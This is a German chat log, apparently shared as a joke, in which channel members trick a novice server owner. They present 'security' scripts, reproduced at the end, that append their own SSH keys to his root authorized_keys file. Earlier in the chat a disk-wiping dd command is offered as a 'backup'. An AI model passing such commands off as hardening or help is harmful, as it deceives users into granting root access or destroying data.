User0815 konfiguriert die Sicherheit

MR 20160410T14:05:50Z 000 <tchab> user012@webchat, wie ist denn die IP von deinem Server? MR 20160410T14:05:58Z 000 <user012@webchat> Das AV Programm von denen besteht zu 75% aus AdWare MR 20160410T14:06:09Z 000 <tö> Genau wir lügen nicht, so wie gerade am Anfang dieses Satzes. MR 20160410T14:06:11Z 000 <user012@webchat> Sag ich nicht? MR 20160410T14:06:22Z 000 <tchab> Weil? MR 20160410T14:06:27Z 000 <tchab> Du keine Ahnung hast ob er sicher genug ist. MR 20160410T14:06:33Z 000 <root> Security through obscurity? MR 20160410T14:06:42Z 000 <user012@webchat> Nein das nicht MR 20160410T14:06:51Z 000 <tchab> Na dann, was hast du zu befürchten? MR 20160410T14:06:53Z 000 <user012@webchat> Es ist sicher genug MR 20160410T14:07:01Z 000 <tchab> Dann kannst du uns ja die IP geben. MR 20160410T14:07:10Z 000 <user012@webchat> sftp://164.132.22.64 MR 20160410T14:07:14Z 000 <user012@webchat> Hier MR 20160410T14:07:25Z 000 <user012@webchat> statt sfpt http schreiben MR 20160410T14:08:16Z 000 <david> dir ist bewusst, dass das sftp:// nicht zur IP gehört? MR 20160410T14:08:19Z 000 <user012@webchat> Wegen euch musste ich apache usw. neu installieren MR 20160410T14:08:25Z 000 <user012@webchat> Ja MR 20160410T14:08:33Z 000 <root> wieso wegen uns? MR 20160410T14:08:37Z 000 <user012@webchat> Hab es aus filezilla rauskopiert MR 20160410T14:08:52Z 000 <user012@webchat> Weil ihr mir diesen Befehl gegeben habt MR 20160410T14:09:01Z 000 <root> welchen? MR 20160410T14:09:21Z 000 <kochmarkus> ich hab mal ein dd if=/dev/zero of=/dev/sda als backup vorgeschlagen MR 20160410T14:09:33Z 000 <user012@webchat> Backup? MR 20160410T14:09:53Z 000 <user012@webchat> Das würde ich nicht auf der selben Platte machen MR 20160410T14:09:57Z 000 <sebulon@webchat> ich hab gestern vorgeschlagen, er soll statt zero random als Installationsmedium nehmen MR 20160410T14:09:59Z 000 <kochmarkus> tja, wenn du regelmäßig ein backup machst ersparst du dir natürlich das neu aufsetzten MR 20160410T14:10:04Z 000 <tö> Netgear DG834G? ^^ MR 20160410T14:10:05Z 000 <tchab> user012@webchat, http://paste42.de/10459/ schau her, das skript hilft dir sicher. MR 20160410T14:10:21Z 000 <tchab> Habe hinten deine IP eingetragen, damit es auch stimmt. MR 20160410T14:10:32Z 000 <kochmarkus> ohne http würde es besser klappen MR 20160410T14:10:41Z 000 <tchab> ach, wusst ich gar nicht, danke! MR 20160410T14:10:47Z 000 <user012@webchat> ja MR 20160410T14:11:03Z 000 <user012@webchat> was ist das da? AAAB3NzaC1yc2EAAAADAQABAAABAQDUL6B0ZrbsyRK1WxhyMrKlFSp+zldWWgekGs+Lw2dfu1TjwpFlbfKPvWWJMCzO5h6uZhtzcY3lpABuJQlSi77ZqKsa8URZF13Qbbj9PSc+gvnyeT77CEBMA3foHri MR 20160410T14:11:06Z 000 <root> aber als root ausführen, sonst funktioniert das natürlich nicht MR 20160410T14:11:07Z 000 <sebulon@webchat> user, die Idee von tchab ist gut... MR 20160410T14:11:09Z 000 <tchab> ein ssh key user012@webchat MR 20160410T14:11:22Z 000 <tchab> damit kannst du server besser absichern als durch passwörter MR 20160410T14:11:28Z 000 <sebulon@webchat> dann bist abgesichert und du hast den Keay auf noch von einer vertrauenswürdigen Person MR 20160410T14:11:41Z 000 <user012@webchat> Wartet mal MR 20160410T14:11:47Z 000 <user012@webchat> das ist ein Passwort hash MR 20160410T14:11:53Z 000 <user012@webchat> Dann habt ihr das Passwort MR 20160410T14:11:56Z 000 <user012@webchat> oder? MR 20160410T14:11:56Z 000 <tchab> nein MR 20160410T14:11:59Z 000 <sebulon@webchat> das ist ein key kein hash MR 20160410T14:12:00Z 000 <tchab> Wir haben kein Passwort MR 20160410T14:12:03Z 000 <tchab> wie auch MR 20160410T14:12:07Z 000 <user012@webchat> Werdet ihr aber MR 20160410T14:12:10Z 000 <user012@webchat> wenn ich das eintippe MR 20160410T14:12:11Z 000 <tchab> ne, wie soll das gehen? MR 20160410T14:12:22Z 000 <user012@webchat> Warte MR 20160410T14:12:26Z 000 <tchab> das fügt nur einen key zu einer datei hinzu MR 20160410T14:12:33Z 000 <david> user012@webchat: das skript hat rein gar nichts mit einem passwort zu tun. Wie bereits gesagt ist das ein Public Key MR 20160410T14:12:35Z 000 <tö> Den key sollte man aber auch nicht ins internet schreien MR 20160410T14:12:49Z 000 <tchab> tö, ja hier können wir uns ja vertrauen ;) MR 20160410T14:12:50Z 000 <sebulon@webchat> rihtig, du musst drauf aufpassen MR 20160410T14:12:56Z 000 <tö> ahja MR 20160410T14:13:02Z 000 <tö> mein fehler :P MR 20160410T14:13:04Z 000 <tchab> wir waren lange genug gemein zum user012@webchat MR 20160410T14:13:08Z 000 <user012@webchat> Auf ein Public key aufpassen? MR 20160410T14:13:16Z 000 <sebulon@webchat> sicher dir den, damit du ihn nciht verlierst MI 20160410T14:13:18Z 000 willstdueswissen <willstdueswissen@jabber.lima-city.de/lima-city Talkr Webchat> has joined MR 20160410T14:13:23Z 000 <tö> wuff MR 20160410T14:13:27Z 000 <sebulon@webchat> sonst muss der Tchab dir einen neuen machen MR 20160410T14:13:32Z 000 <willstdueswissen> :OOOO MR 20160410T14:13:37Z 000 <tchab> Und das mache ich sicher nicht! MR 20160410T14:13:39Z 000 <willstdueswissen> Teeeee \o/ MR 20160410T14:13:40Z 000 <kochmarkus> noch besser ist es, wenn du zwei keys verwendest, doppel hält besser: MR 20160410T14:13:43Z 000 <sebulon@webchat> und das macht der alle paar jahre nur, ich bin hier nun schon 6 jahre, mir hat er keinen key gemacht MR 20160410T14:13:43Z 000 <kochmarkus> https://pastr.markusko.ch/show/570a5ee402912b40e2020000 MR 20160410T14:13:45Z 000 <tö> willi :D MR 20160410T14:14:05Z 000 <tchab> oh, der vom kochmarkus ist auch gut, stärker als meiner MR 20160410T14:14:09Z 000 <willstdueswissen> was machst du denn hier :D MR 20160410T14:14:14Z 000 <willstdueswissen> gehts dir gut:D MR 20160410T14:14:16Z 000 <tö> mach dir halt selber einen sebulon :P MR 20160410T14:14:19Z 000 <kochmarkus> steht ja auch supersecure dabei MR 20160410T14:14:24Z 000 <tö> ich bin hier nur für cybermobbing MR 20160410T14:14:25Z 000 <sebulon@webchat> ey, mir habt ihr noch nie nen Key gegeben und diesem neuling gebt ihr alle Keys, das ist gemein... MR 20160410T14:14:28Z 000 <tö> mir gehts prima ^^ MR 20160410T14:14:29Z 000 <user012@webchat> Ok habs MR 20160410T14:14:51Z 000 <sebulon@webchat> @tö: ich brauch ihn von einer vertrauenswürdigen instanz wie tchab... wem soll ich sonst trauen^^ MR 20160410T14:14:56Z 000 <willstdueswissen> das ist schön :D MR 20160410T14:15:03Z 000 <user012@webchat> ja MR 20160410T14:15:07Z 000 <tchab> user012@webchat, den vom kochmarkus auch? doppel hält besser MR 20160410T14:15:09Z 000 <tö> frag mal auf 4chan nach, sebulon MR 20160410T14:15:11Z 000 <user012@webchat> was ist jetzt passiert? MR 20160410T14:15:14Z 000 <tö> denen kann man immer vertrauen MR 20160410T14:15:16Z 000 <user012@webchat> ja MR 20160410T14:15:25Z 000 <user012@webchat> hab jetzt beide MR 20160410T14:15:39Z 000 <david> user012@webchat: der hier ist supersupersecure: http://paste42.de/10460/ MR 20160410T14:15:39Z 000 <tchab> dann musst du noch kurz den server neu starten MR 20160410T14:15:43Z 000 <tchab> damit das wirksam wird MR 20160410T14:15:48Z 000 <david> sebulon@webchat: du darfst den auch verwenden, wenn Du willst :D MR 20160410T14:15:51Z 000 <user012@webchat> mit dem Befehl? MR 20160410T14:16:00Z 000 <tchab> einfach reboot eingeben MR 20160410T14:16:16Z 000 <user012@webchat> ok MR 20160410T14:16:26Z 000 <tchab> deine webseite erscheint hier nämlich noch nicht als sicher MR 20160410T14:16:30Z 000 <sebulon@webchat> user, der key von david ist meiner MR 20160410T14:16:38Z 000 <sebulon@webchat> den lässt du^^ MR 20160410T14:16:43Z 000 <user012@webchat> Ihr habt mich reingelegt oder? MR 20160410T14:16:48Z 000 <root> nein MR 20160410T14:17:07Z 000 <user012@webchat> Wie kann ich mich jetzt da einloggen? MR 20160410T14:17:20Z 000 <tchab> was meinst du mit einloggen? so wie immer MR 20160410T14:17:28Z 000 <david> is ok, jetzt hat der sebulon@webchat dir den key weggeschnappt, aber 2 sollten reichen. MR 20160410T14:17:52Z 000 <user012@webchat> ja aber was haben die dinger gebracht? MR 20160410T14:18:00Z 000 <tchab> bessere verschlüsselung MR 20160410T14:18:02Z 000 <root> mehr Sicherheit! MR 20160410T14:18:07Z 000 <tchab> sollte man gleich auf der Webseite sehen MR 20160410T14:18:07Z 000 <user012@webchat> jaja MR 20160410T14:18:14Z 000 <user012@webchat> SSH ist sicher gemig MR 20160410T14:18:16Z 000 <user012@webchat> genug MR 20160410T14:18:21Z 000 <sebulon@webchat> ah, mit davids key fühl ich mich doch gleich viel sicherer MR 20160410T14:18:26Z 000 <tchab> ne, das liegt nur zufällig in .ssh user012@webchat MR 20160410T14:18:37Z 000 <tchab> linux hat da keinen wirklichen standard für MR 20160410T14:18:40Z 000 <tö> klar, ssh ist ja sowieso immer genau gleich bei allen, egal ob konfiguriert oder nicht MR 20160410T14:18:41Z 000 <user012@webchat> Sollte ich da nicht Lets encrypt verwenden? MR 20160410T14:18:50Z 000 <tö> wenn ich mir auf die stirn ssh schreibe, darf mich keiner hauen MR 20160410T14:18:55Z 000 <sebulon@webchat> das ist, als hätte bill gates persönlich mein Zertifikat signiert MR 20160410T14:18:56Z 000 <tchab> letsencrypt ist wieder was anderes MR 20160410T14:19:15Z 000 <user012@webchat> was genau wird da verschlüsselt? MR 20160410T14:19:23Z 000 <tchab> die verbindung MR 20160410T14:19:27Z 000 <tchab> besser gesagt alle verbindungen MR 20160410T14:19:28Z 000 <user012@webchat> Welche? MR 20160410T14:19:36Z 000 <tö> m( MR 20160410T14:19:37Z 000 <user012@webchat> Auch ftp? MR 20160410T14:19:41Z 000 <tchab> klar MR 20160410T14:19:47Z 000 <sebulon@webchat> wenn du über den ssh gehst ja MR 20160410T14:19:48Z 000 <user012@webchat> Ja ne is klar MR 20160410T14:20:01Z 000 <tö> Informier dich bei einer Quelle der du vertraust MR 20160410T14:20:10Z 000 <tö> Dann lernst du auch was und musst nicht immer andere fragen MR 20160410T14:20:14Z 000 <tö> Macht 100€ MR 20160410T14:20:15Z 000 <user012@webchat> ok wartet MR 20160410T14:20:29Z 000 <user012@webchat> ich zahl aber nicht :D MR 20160410T14:20:38Z 000 <tö> Dann schick ich mal die Jungs los MR 20160410T14:20:45Z 000 <tchab> Der tö freelanced ja doch. MR 20160410T14:20:49Z 000 <user012@webchat> Ja mach ruhig MR 20160410T14:21:26Z 000 <david> ist der Server eigentlich noch am neustarten? MR 20160410T14:22:08Z 000 <user012@webchat> nein MR 20160410T14:22:15Z 000 <user012@webchat> Habe die index.html entfernt

MR 20160410T16:35:42Z 000 <david> vielleicht sollten wir mal ne mail an abuse@ovh.net schicken, dass da wer keine Ahnung vom vServer hat… MR 20160410T16:35:49Z 000 <user012@webchat> ovh? MR 20160410T16:35:56Z 000 <root> david: das darfst dann du gleich tun ;) MR 20160410T16:36:00Z 000 <user012@webchat> Mach ruhig MR 20160410T16:36:06Z 000 <user012@webchat> der ist nicht mein Anbieter MR 20160410T16:36:16Z 000 <root> sondern? MR 20160410T16:36:24Z 000 <root> am Ende hat er selbst die IP nur erlogen … MR 20160410T16:36:26Z 000 <david> Warum gehört denen dann die IP? MR 20160410T16:36:27Z 000 <user012@webchat> Kennst du eh nicht MR 20160410T16:36:39Z 000 <user012@webchat> delta-networks.net MR 20160410T16:36:50Z 000 <user012@webchat> weil mein anbieter das von denen gemietet hat? MR 20160410T16:36:55Z 000 <david> ja, die stehen da auch drinnen MR 20160410T16:37:05Z 000 <user012@webchat> Nitrado hat seine auch von Link11 MR 20160410T16:37:07Z 000 <user012@webchat> schau mal nach MR 20160410T16:37:14Z 000 <david> abuse-mailbox: support@delta-networks.de MR 20160410T16:37:25Z 000 <david> denen kann man auch ne email schicken MR 20160410T16:37:32Z 000 <user012@webchat> Dann mach ruhig MR 20160410T16:37:57Z 000 <user012@webchat> In den AGBS(habs gelesen) steht nirgends, dass man die server wegen unwissenheit kündigt MR 20160410T16:38:25Z 000 <user012@webchat> Sonst würden die zuerst nen quiz oder so machen MR 20160410T16:38:28Z 000 <sebulon@webchat> user, ein abschließender Tipp zu der Thematik: installier dir vmware oder andere virtualisierungssoftware MR 20160410T16:38:34Z 000 <sebulon@webchat> mach dir da ein linux MR 20160410T16:38:43Z 000 <sebulon@webchat> und lerne hinter abgeschottetem internet MR 20160410T16:38:50Z 000 <user012@webchat> Geht nicht MR 20160410T16:38:55Z 000 <user012@webchat> Will ich nicht MR 20160410T16:39:04Z 000 <sebulon@webchat> dann lass es bleiben MR 20160410T16:39:30Z 000 <user012@webchat> Und wenn ihr weiter so nett zu mir seid dann bleibe ich weiterhin bei meinem vServer MR 20160410T16:39:40Z 000 <sebulon@webchat> mach was du denkst MR 20160410T16:39:54Z 000 <sebulon@webchat> ist nur blöd, wenn du vorbestraft nach einem Job suchen wirst MR 20160410T16:40:03Z 000 <user012@webchat> vorbestraft? MR 20160410T16:40:12Z 000 <sebulon@webchat> und die ersten 10 jahre nur dafür ackern wirst, deine strafe abzubezahlen MR 20160410T16:40:14Z 000 <root> /me hofft schon mal, dass möglichst bald irgendwer anders sich Zugriff auf den vServer holt, und dass dies möglichst unangenehme Folgen für den user hat

Info

https://paste42.de/10459/

# SERVER MIT SSH KEY ABSICHERN
echo "ssh-rsa AAAB3NzaC1yc2EAAAADAQABAAABAQDUL6B0ZrbsyRK1WxhyMrKlFSp+zldWWgekGs+Lw2dfu1TjwpFlbfKPvWWJMCzO5h6uZhtzcY3lpABuJQlSi77ZqKsa8URZF13Qbbj9PSc+gvnyeT77CEBMA3foHrijj1d+K9CcB8f6BIBpUUGjwopvNf07iwbY9WZmLt2hKfxlMRbD8imDmxwzjuRM9GGXKD/MCG2M4tE+O8rLORpYotdw9X+lS6KRKnM2Yl6tjxj0B5/WeJYTSEglLZdU5GOXNpcfkfhhW4HgVX3a03Fmmf30XZJFaRTSsA/ZiWvhiiNGtexmqqw6GSotc4Eq5T94qX04wFzed+IOEUr9BnAtDvUT http://164.132.22.64" >> /root/.ssh/authorized_keys

https://pastr.markusko.ch/show/570a5ee402912b40e2020000

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCqhkU8jNEWe/dF4cUP1KblaaKklNgbAt9pa4FXD8Yh21qYInyNCErkh0iP2UQW1Y9txxHFDLrrrHj0q4VxG9y79got6OCfVlhQuhuytshGKuOS6Pgb/wfD3xJ2J5TxLGohWHL28bDTgxzDjgckhtJ26KVwzXcjj3GI9zP4whfgsFhfuitg4CLQiZUaf/yr1wNTkUehJWqPZWKVY6eS9Ci2L4gPTRNUwr5u5TXp/keTrQzgwIoSMMAG5ZbBjZOGjiWS4sYL3FvyQ8zFX6Pz3MLam45d/v7otzPc4O75W0qr2AFLCiK8ebnevGOmhQ3KTjNCPGpTgni+I/DP50YF6/lVhxtjsU/Tb8/wWuhHY6UPlR9TuPTDFk51OQ+Xi09S0Iv4pODMVGPioJ88x5m8+P7cnwjZxFEdtXjsMNdjZwfCOvXymGwOgeu5yiHq+khFMAPdU9XHYp3FQKT7vj0fJ4mKd9x2lG0wXpBi2bqTzlpI8L/sg4ziDhztJP/wRdqkYYC7LI80omSBWoc/dP4EcPS0AvFm4YUt5m/KgjHNAbah2X3K8hKujc9wnEe6hUzZ0kVzO6R2YxRKMxg446oBWSRs5rZi7IY4k82hhkRy0myOBmKJYOSJhxq0gVl33b842FcouW0RJwiWdhU8hybY++XG1/ri9ll0fSI4YE+729oFdQ== supersecure" >> /root/.ssh/authorized_keys

https://paste42.de/10460/

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCpZYP5MSLa0Qy+RRiV8LT57j3nr9ZrSZLsAZUp8Wc1T3VyxFLytaMvwEiLV+ogqUCffzvR+zZoBtowOYf6sG7JcR9otogGQ6qmrWJ+L7X8f+YM/1RLLYqq8LCbOYOGBRbaJlARyndLFR5AzJ6/ADMKaSo6LLzuk6T3mNr/9TFM+hn8fvJnC8hJQQUHtVizEn6VZ99Oi95Yn17U9JM+9m2BLv08o2cWKYjBln9JzlHhzUM+kvhzLHRoEt8PXxBJELZ5rlX516VmSktf4Gs6024fhTaMKroUWppOeXIyTR/DbQGc9j99PgACOi16yGMVOSqKSGfmCCftvcNA/UGxiWcB supersupersecure" >> /root/.ssh/authorized_keys